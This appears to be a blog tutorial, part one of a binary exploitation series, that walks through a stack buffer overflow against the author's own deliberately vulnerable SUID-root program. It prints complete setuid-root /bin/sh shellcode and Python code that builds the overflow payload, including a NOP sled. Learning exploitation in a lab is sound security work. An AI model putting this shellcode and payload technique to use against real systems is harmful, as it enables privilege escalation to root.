Adventures in Binary Exploitation: Part 1

In the introduction we looked at some crappy code, looked at how we were going to attack it and discussed the various mitigations in place to try and stop us. Which we promptly disabled because we are n00bs.

In this part we're going to install some useful new tools first. If you're on Kali Linux you may have some of these already and should fully update your installation. In fact, everyone else go do that anyway.

Next we'll install some specific things:

Gdb-peda - a Python-based addon for the ubiquitous gdb debugger, something we'll be using a lot. It has some ace tools to help with exploitation and reverse engineering of binaries.
Pwntools - a Python library to assist in exploit development and reverse engineering that provides helpful wrappers for commonly used code.

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

Pwntools is available via a few methods - more information on downloading and installing it can be found here.

Before we start, we need to change the attributes of our binary by changing the owner to root and setting the SUID bit (you'll need root privileges for both commands, so use sudo if you aren't already root). The SUID bit makes a program run with the privileges of the file's owner rather than those of the user who launched it. It's what lets commands like passwd be run by a normal-level user while still changing root-owned data. Exploiting a remote service running in that way would be a good thing... There's also the SGID bit, but we're not going to do anything with that here.

chown root ./part1
chmod u+s ./part1
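
If you want to double-check that the bit actually got set, something like the following minimal Python sketch should do it. The helper names (has_suid_bit, describe) are made up for illustration, and it assumes the binary is sitting at ./part1 in the current directory.

```python
import os
import stat


def has_suid_bit(mode: int) -> bool:
    """Return True if the SUID bit is set in a file mode value."""
    return bool(mode & stat.S_ISUID)


def describe(path: str) -> str:
    """Summarise the owner uid, permission string and SUID status of a file."""
    info = os.stat(path)
    return "uid={} perms={} suid={}".format(
        info.st_uid, stat.filemode(info.st_mode), has_suid_bit(info.st_mode)
    )


if __name__ == "__main__":
    target = "./part1"  # assumed location of the vulnerable binary
    if os.path.exists(target):
        print(describe(target))
```

After the chown and chmod, you'd hope to see uid=0 and suid=True for the binary.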

Time to play!

Let's run our app and see what we can do. The first thing you've probably figured out is that we're gonna put in a bunch of characters and see what happens. Let's go for 200 characters. We can do this pretty simply with python on the command line, followed by piping the output into our vulnerable app.
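
As a rough sketch of the filler-generating step, assuming Python 3: the make_filler name is hypothetical, and it writes raw bytes to stdout so the output can be piped straight into the binary.

```python
import sys


def make_filler(count: int, char: bytes = b"A") -> bytes:
    """Build `count` copies of a single filler byte."""
    if len(char) != 1:
        raise ValueError("char must be exactly one byte")
    return char * count


if __name__ == "__main__":
    # Write raw bytes so nothing gets re-encoded on the way out.
    sys.stdout.buffer.write(make_filler(200) + b"\n")
```

Saved under a name of your choosing (say fill.py, purely as an example), the output can be piped into ./part1 or redirected to a file for later use.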

Boom, a seg fault - this is good. Something went wrong with our program and it crashed. We can use gdb to find out why. The peda addon makes this easier as it displays a bunch of useful information in a very nice format. It shows us the stack and all of the registers. It also shows us where the program execution was broken and the instructions around it. I re-ran the above command and used the > redirector to send the A characters to a file. I then loaded gdb and ran the program inside it with the "r" command, sending the file as the input with the < redirector.

0x4141414141414141 eh? And lots of mentions of "A" characters all over the place. It looks like the crash occurred at the return instruction at the end of vuln(). The return instruction pops an address off the top of the stack (the stack pointer - %rsp - marks the current top of the stack, which is where the CPU pushes data on or pops data off) and puts it into the %rip register. The %rip register holds the instruction pointer - the address of the next instruction to be executed. All of those 41s just so happen to be the hex equivalent of A in ASCII - the character we used in our input. That location doesn't exist as a readable location so the CPU shits a brick and kills execution.

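It’s also worth noting that the specific reason for the segfault is more than just a memory location that is unreadable, although that would certainly cause a segfault normally. 0x4141414141414141 isn’t even a valid ("canonical") address: x86-64 CPUs typically only use the lower 48 bits of an address, so user-space addresses top out at 0x00007fffffffffff. So it’s doubly bad. It’s also why the bad value is still sitting at the top of the stack rather than in %rip: the CPU faults on the return instruction before the address is ever loaded.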
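
To make that concrete, here's a small Python sketch. It assumes the usual 48-bit addressing scheme, and the is_canonical helper is my own illustration, not anything from gdb or PEDA.

```python
USER_SPACE_TOP = 0x00007FFFFFFFFFFF  # highest user-space address with 48-bit addressing


def is_canonical(addr: int, bits: int = 48) -> bool:
    """True if every bit above the top implemented bit is a copy of that bit."""
    top = addr >> (bits - 1)                 # bits 63..47 in the 48-bit case
    all_ones = (1 << (64 - bits + 1)) - 1    # what those bits look like when all set
    return top == 0 or top == all_ones


# Eight "A" characters read back as a 64-bit little endian number.
crash_value = int.from_bytes(b"A" * 8, "little")

print(hex(ord("A")))              # the hex value of a single "A"
print(hex(crash_value))           # the value the CPU tried to return to
print(is_canonical(crash_value))  # is it even a legal address?
```

A real stack address like the ones we'll see later passes the check, while the string of 41s does not.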

It would be nice to know how many As we need to write until we're overwriting the area that is read into %rip. If we did that we could put in our own address... then the sky's the limit! Let's use a great feature of peda - the pattern functions (based on work for the Metasploit project). We'll make the pattern (200 characters again) and direct it out to a text file, and then rerun the program in gdb with our pattern fed in as the input.

Now the execution has failed with what looks like our pattern of characters at the top of the stack, right where %rsp is pointing. We're looking at the stack from the current position pointed to by %rsp, then going upwards towards higher memory addresses. Let's see if we can locate that string of characters at the top of the stack and find out how many bytes into the buffer it is. PEDA makes this easy.
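
If you're curious how the pattern trick works under the hood, here's a minimal Python sketch of the idea. It generates a Metasploit-style pattern (Aa0Aa1Aa2...), which is not necessarily byte-for-byte what PEDA produces, and the function names are hypothetical. The point is only that every short chunk of the pattern is unique, so finding the chunk tells you the offset.

```python
import string
from itertools import product


def make_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1Aa2...) truncated to `length` bytes."""
    chunks = []
    total = 0
    for upper, lower, digit in product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        if total >= length:
            break
        chunks.append(upper + lower + digit)
        total += 3
    return "".join(chunks)[:length].encode("ascii")


def find_offset(pattern: bytes, needle: bytes) -> int:
    """Offset of the first occurrence of `needle` in `pattern`, or -1."""
    return pattern.find(needle)


pattern = make_pattern(200)
# Pretend these 8 bytes are what the debugger showed at the top of the stack.
seen_on_stack = pattern[104:112]
offset = find_offset(pattern, seen_on_stack)
print(offset)
```

In a real run you'd copy the bytes out of the debugger instead of slicing them from the pattern yourself.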

We can see that it takes 104 bytes before we reach the bit read in as a return address. The system is running in little endian mode, meaning we need to provide the least significant bytes first - essentially putting our address in reverse. Different CPUs read things from memory in a different order - I don't know why and frankly I don't care. Not my area of expertise. Luckily pwntools can do this for us, as we'll see later in the code.
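
Here's what "putting our address in reverse" looks like in practice, as a small sketch using only Python's standard struct module. The address is just an example stack address and yours will differ. As far as I know, pwntools' p64() produces the same bytes by default.

```python
import struct

# Example stack address only; the real one depends on your system.
example_addr = 0x7FFFFFFFE4A0


def pack64_le(addr: int) -> bytes:
    """Pack an address as 8 bytes, least significant byte first."""
    return struct.pack("<Q", addr)


packed = pack64_le(example_addr)
print(packed.hex())                          # bytes in the order they sit in memory
print(hex(struct.unpack("<Q", packed)[0]))   # and back again
```

Note the two zero bytes on the end: the address is only 6 bytes long, but the slot on the stack is 8.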

Based on what we covered in the introduction we'll be making the return address point to the start of our user input. We control it, so we could put our own code in there, and the stack is executable because we turned off NX. The typical thing to do is to give ourselves a shell with root permissions. Then we've won the game and we can do anything else. Let's check where the start of our buffer is.

First, we'll set a "breakpoint" - the most basic feature of a debugger really. This allows us to temporarily pause execution at a place of our choosing so that we can inspect the CPU and memory states. Then we’ll run the program with some proper input so that we can see how things run normally and where the entered string gets stored. Finally, we’ll use the "find" command to look for our string.

There’s the address of our buffer in the stack - 0x7fffffffe4a0 - clear as day.

Now we need something to put in there. I don't really want to go into writing shellcode right now, so we'll go and grab something from the internet that sets the current uid to 0 for root (sometimes that's needed and running an executable without doing it only gives a normal user shell in my experience - on your system you may not have to do that) and then calls the /bin/sh executable with a syscall. If you have a look at that page you'll see how we're preparing the various CPU registers with the parameters needed for the syscall to call our shell.

We also need to know the length of the shellcode so that we can subtract it from 104. The remainder of the filler up to the return address doesn’t matter. We can stick with the As for now. We could also use the hex value 0x90, which corresponds to the NOP (or NOOP) instruction - No Operation - which literally does nothing. The link to the shellcode lists the length of the code as 48 bytes, leaving us a padding length of 104 - 48 = 56 bytes.

Recon done. Now: the exploit.

\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62
\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31
\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c
\x58\x0f\x05

You'll see that there are some odd characters being used to build up the shellcode. That's because we're no longer entering typeable ASCII characters here. These are raw hex codes. You can find a table here if you want to have a look. The characters are read as single byte values that correspond to instructions that the CPU can run - known as opcodes. This isn't the time to go into those - this isn't an ASM tutorial. The \ is an escape character - essentially it means "don't read what follows literally". The x means read the next two characters as a hex byte value to determine the character. There's no way we could type most of those in with a keyboard.
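
A quick Python sketch of how those escapes are read, using just the first line of the shellcode. The variable names are mine, for illustration only.

```python
# The first line of the shellcode, written with \x escapes...
first_line = b"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"

# ...and the same bytes written as a plain hex string.
same_bytes = bytes.fromhex("4831ffb0690f054831d248bbff2f62")

# A raw string keeps the backslash, so this is 4 characters, not 1 byte.
not_escaped = r"\x48"

# Only a handful of the bytes happen to be typeable ASCII characters.
printable = bytes(b for b in first_line if 0x20 <= b < 0x7F)

print(len(first_line), first_line == same_bytes, len(not_escaped), printable)
```

Each \xNN turns into exactly one byte, which is why 15 escapes give 15 bytes and not 60 characters.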

Now that we have our return address and some shellcode it's time to actually put something together and test it out. This is where pwntools comes in. We'll use some simple operations to build up our buffer bit-by-bit, then run the process, and then send it our input. Addresses are converted to 64-bit little endian and entered into the buffer at the correct place. Finally we can make our script write the input to a file that we can feed into the program when we run it inside gdb.
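
A rough sketch of that buffer-building step, using only the standard library so it runs anywhere. With pwntools you'd swap struct.pack for p64(). The offset and address are the ones from my system above and will almost certainly differ on yours. The function names and the payload.bin filename are made up for illustration.

```python
import struct

SHELLCODE = (
    b"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
    b"\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
    b"\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
    b"\x58\x0f\x05"
)
OFFSET_TO_RET = 104            # bytes of input before the saved return address
BUFFER_ADDR = 0x7FFFFFFFE4A0   # start of the buffer as seen inside gdb


def build_payload(shellcode: bytes = SHELLCODE, ret_addr: int = BUFFER_ADDR) -> bytes:
    """Shellcode first, filler up to the return address, then the new address."""
    pad_len = OFFSET_TO_RET - len(shellcode)
    if pad_len < 0:
        raise ValueError("shellcode is too long to fit before the return address")
    return shellcode + b"A" * pad_len + struct.pack("<Q", ret_addr)


def write_payload(path: str, payload: bytes) -> None:
    """Save the payload so it can be fed to the program with the < redirector."""
    with open(path, "wb") as handle:
        handle.write(payload)


payload = build_payload()
print(len(SHELLCODE), len(payload))
```

Calling write_payload("payload.bin", payload) gives you a file to feed in when running the program inside gdb.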

Calling this inside gdb gives us... a shell! Which then promptly fucks off. We can’t really interact with it inside gdb, so we need to get our exploit running outside gdb. If we change the bottom part of our exploit to the following we can send the payload to our executable and enable two-way communication over stdin and stdout with some more useful pwntools functions. Let’s give it a go:

Balls! It didn’t work! This confused me for the longest time. A Google search revealed the answer. When you run code inside gdb some environment variables get set which are placed onto the beginning (read: higher memory addresses) of the stack, changing our buffer location and making our exploit fail outside of gdb. How big the difference is varies by system, so we’ll need to bypass this issue in an elegant way that works on as many systems as possible.

This is where NOOP sleds come in. From my search it seems that the difference can be as small as 40 bytes and as large as 96 bytes. We’ll need to find some way to stop our return address pointing somewhere we didn’t intend and instead have it point towards something that will get us to the shellcode.

What if we were to add a bunch of NOOPs to the start of our buffer and try adjusting the return address? Remember: the address will be higher than we think because there’s no extra stuff inserted by gdb at the start of the stack. If we keep increasing it we will eventually hit our NOOP sled and slide allllllll the way to the start of our shellcode. Nice!

This way we can be more imprecise with our return address - we just have to hit one of the NOOPs randomly. However, the length of our shellcode plus the NOOP sled and any padding required obviously can’t be larger than 104 bytes, or we’ll be unable to overwrite the return address.

Using NOOPs is also good because they only take up a single byte. You don’t have to try and predict the address of a longer instruction and then accidentally land half way through, possibly causing a crash. By hardening your exploit against many problems like this you can ensure that it runs on more variations of system - which is always nice.
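
Here's the sled idea as a small Python sketch. The sled length, the guessed address and the helper names are all illustrative assumptions and not the exact values from my exploit. A run of 0xcc bytes stands in for the real shellcode to keep it short.

```python
import struct

NOP = b"\x90"
OFFSET_TO_RET = 104  # bytes of input before the saved return address


def build_sled_payload(shellcode: bytes, sled_len: int, ret_addr: int) -> bytes:
    """NOP sled, then shellcode, then filler, then the packed return address."""
    pad_len = OFFSET_TO_RET - sled_len - len(shellcode)
    if pad_len < 0:
        raise ValueError("sled + shellcode do not fit before the return address")
    return NOP * sled_len + shellcode + b"A" * pad_len + struct.pack("<Q", ret_addr)


def slides_to_shellcode(payload: bytes, buffer_addr: int, sled_len: int) -> bool:
    """True if the return address lands on a NOP or on the first shellcode byte."""
    (ret_addr,) = struct.unpack("<Q", payload[OFFSET_TO_RET:OFFSET_TO_RET + 8])
    return buffer_addr <= ret_addr <= buffer_addr + sled_len


placeholder_shellcode = b"\xcc" * 48   # stand-in for the real 48 bytes
gdb_buffer_addr = 0x7FFFFFFFE4A0       # where gdb said the buffer was
guess = gdb_buffer_addr + 16           # hypothetical guess, nudged upwards

payload = build_sled_payload(placeholder_shellcode, 32, guess)

# Try a few possible "real" buffer locations outside gdb.
for shift in (0, 8, 16, 40):
    print(shift, slides_to_shellcode(payload, gdb_buffer_addr + shift, 32))
```

Any guess that falls within the sled still works, which is exactly the slack we want. A shift bigger than the guess lands below the buffer and fails.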

At first I was tempted to use the maximum possible padding, but when testing inside gdb it seemed that the end of my shellcode got overwritten somehow. Weird, canaries are turned off. Maybe something else is doing it. Edit: I think it’s the result of the read() call being stored on the stack? Another likely culprit is the shellcode itself: after the return, %rsp sits just above the return address slot, so the shellcode's own push instructions write back over the last few bytes of the buffer. Whatever, let’s take off some NOOPs, move the shellcode back, and add some padding back to get us to the return address location properly. We’ll adjust the return address forward by 48 bytes.

Bang! We're in! Later checking by changing the return address lots and re-running a few times revealed that the offset was exactly 32 bytes. A bit annoying at the end there, but we’ve learnt some useful things. Feels pretty good, doesn't it? Well, we're gonna start turning protections on one at a time to see what we can do. Strap in.

Link: Part 2

ElMarko says things